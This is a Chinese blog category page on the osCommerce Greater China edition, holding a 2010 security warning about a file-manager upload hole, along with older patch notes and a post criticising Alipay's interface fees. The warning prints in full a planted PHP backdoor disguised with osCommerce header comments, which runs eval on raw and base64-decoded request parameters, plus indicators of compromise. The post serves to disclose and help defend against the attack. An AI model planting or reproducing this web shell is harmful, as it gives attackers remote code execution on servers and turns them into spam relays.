Category: osCommerce大中华版


osCommerce安全漏洞警告(垃圾邮件群发)

Filed Under: osCommerce大中华版 by maxidea — 留下评论
2010年04月13日

最近发现osCommerce的后台管理程序file_manager.php可能存在漏洞,会被黑客恶意上传文件到服务器上,请用户在进行文件管理时尽可能使用FTP软件,并对/catalog/admin/file_manager.php进行删除处理。

该漏洞引起的问题如要特征如下:

1)服务器上被载入额外的php文件,例如:
/catalog/images/btaxf/index.php
其中btaxf文件夹名字是随机组合,有的受攻击者机器上的目录名为yahoo

2)该index.php文件的权限是nobody,例如:
-rwxrwxrwx 1 nobody nobody 1181 Apr 12 07:46 index.php*

3)主机会被用来群发垃圾邮件,黑客通过POST方式访问:
“POST /catalog/images/btaxf/index.php HTTP/1.1″ 200 2 “-” “PycURL/7.18.2″

4)该恶意增加index.php文件的代码如下:
/*
$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

Copyright (c) 2003 osCommerce

Released under the GNU General Public License
*/

// require('includes/application_top.php');
// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_addre
ss) . "' and customers_id != '" . (int)$customer_id . "'");

// $check_email = tep_db_fetch_array($check_email_query);
// if ($check_email["total"] > 0) {

// $error = true;
error_reporting(0);

// if (!tep_session_is_registered(‘customer_id’)) {
eval(stripslashes($_REQUEST['osc']));
// if (ACCOUNT_GENDER == ‘true’) {
// if ( ($gender != ‘m’) && ($gender != ‘f’) ) {
// $error = true;
eval(base64_decode($_REQUEST['osc64']));
// $messageStack->add(‘account_edit’, ENTRY_GENDER_ERROR);
// }

// }
// $navigation->set_snapshot();
if(!(count($_GET)+count($_POST)))echo “Open Source E-Commerce Solutions “, 2000+10, ” year”;
// tep_redirect(tep_href_link(FILENAME_LOGIN, ”, ‘SSL’));

// }

?>

由于涉及的osCommerce版本较多,官方未提供解决办法,请用户发现该index.php文件后必须删除。

Tags: , ,
评论

专用补丁:解决MySQL 5.0的兼容问题1054错误 (2009-3-17)

Filed Under: osCommerce大中华版 by maxidea — 评论关闭
2009年04月16日

由于MYSQL 5的新特性,导致SQL语句会出现以下错误提示:
1054 – Unknown column ‘p.products_id’ in ‘on clause’ select count(p.products_id) as total from products p, products_description pd, manufacturers m, products_to_categories p2c left join specials s on p.products_id = s.products_id where p.products_status = ’1′ and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = ’10′ and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = ’5′ and p2c.categories_id = ’21′
出现以上1054错误信息,请下载补丁,并覆盖对应的文件即可:
http://www.maxcapture.com/download/osc/debug/mysql5-1054fail.zip
本补丁仅用于为osCommerce大中华版2006专用。(*注意:如您的OSC能正常使用,则无须安装此补丁)

Tags:
Permalink

专用补丁:解决register_globals的兼容问题v1.5.2

Filed Under: osCommerce大中华版 by maxidea — 留下评论
2008年10月27日

由于之前发布的v1.5专用补丁存在Bug,会导致出现以下错误:

Fatal error: Call to undefined function tep_admin_check_login() in /home2/voguecam/public_html/admin/includes/application_top.php on line 217

解决办法是替换新版补丁中的catalog\admin\includes\functions\general.php文件,覆盖对应位置。

新版补丁的下载地址是:
http://www.maxcapture.com/download/osc/debug/register_globals_v1.5.2-OSCGC.zip

本补丁仅用于为osCommerce大中华版2006专用,可解决“register_globals is disabled in php.ini”的问题。

评论

对支付宝接口的强迫消费说不!

Filed Under: osCommerce大中华版, 网络技术 by maxidea — 留下评论
2007年11月09日

10月中,又收到马云的支付宝公司的EMAIL警告,说10月20日起:“支付宝将针对于非签约商家(在淘宝网和阿里巴巴网站的交易除外)取消3%收费, 同时您使用的支付宝接口将会被停止。如果您在10月20日之前未与支付宝公司签署收费协议,您使用的支付宝接口将会被停止。”

这意味着,支付宝将给外部接口的用户带来它的“优惠”套餐,按最低6万一年的交易额支付接口年度租用费。

这个EMAIL没有得到我的重视, 原因很简单,首先支付接口的技术并不是支付宝公司专有的,用户可以自由选择他们喜欢的支付接口,只要用户能按照接口的技术要求修改程序,而且同意支付相关额度的费用;

其次,支付宝实在有点不要脸,5月份(就是刚开始按每笔收费3%后的几个月)就收到通知,说要全面停止按笔收费,改为按年度一次性收费。当时我就支付宝接口对PHP 程序支持不足的问题提出疑问,得到的回应是他们的工程师将免费为用户集成接口,并发给我一些代码,我一看,原来是网友raftcham提供的代码,看来支付宝把“拿来主义”应用得淋漓尽致了,这点做过PAYPAL接口开发的用户肯定觉得我没说错。而另一方面,支付宝还没有为最常见的几种网上商店程序提供官方或非官方的接口模块(包括osCommerce),这点真让人觉得马云是想钱想疯了。

再次,说到钱就伤感情, 很多使用支付宝接口的网店是中小型以下的,一年的交易额是难以达到2万,更不用说6万的最低消费了。虽然支付宝接口的套餐的确比按次支付接口使用费要便宜很多,但对于海量的小型网店来说,这样的强迫消费只能把他们赶尽杀绝,又或是选择投奔淘宝网开店。在马云的角度,这真是个一石二鸟的好计!如果我是马云,我会把想出这个鬼主意的员工升职加薪,最少给他一个区域经理做做,呵呵。

话说回来,支付宝今次也再次拖延了实施时间,但再不是5月拖到10月,因为他等不及了,阿里巴巴要上市,要在第一天把香港的散户套牢,要让香港人都做股东去,所以它10月20日过没两天,就把我这个还没有签约的小用户给挡在门外了。

不过,好在我还会那么一点编程,呵呵,几天时间把接口换到PAYPAL的中国贝宝上去了,希望马云没有被气死,人家可是免费使用的哦,呵呵~

我还是在网页上保留了原来支付宝接口的选择,各位有兴趣可以去测试一下,地址如下:

http://www.maxcapture.com/order/

评论

OSC大中华版后台管理界面更新

Filed Under: osCommerce大中华版 by maxidea — 1 条评论
2007年11月04日

问题描述:使用非简体中文的后台时,“系统设定”部分的菜单会全部变成乱码。
问题成因:因为“系统设定”的菜单由数据库产生,暂时程序设计无法使其支持多种语言,只能用一种通用语言取代,原来OSC大中华使用简体中文取代,导致其他语言的后台界面显示此部分会出乱码。
解决办法:是使用fixadminbugs20071104.sql文件覆盖原有数据库中的对标题文本做定义的文字,把该部分菜单都改为英文。fixadminbugs20071104.sql可使用phpMyAdmin进行导入。

评论
Powered by WordPress | Theme: Motion by 85ideas.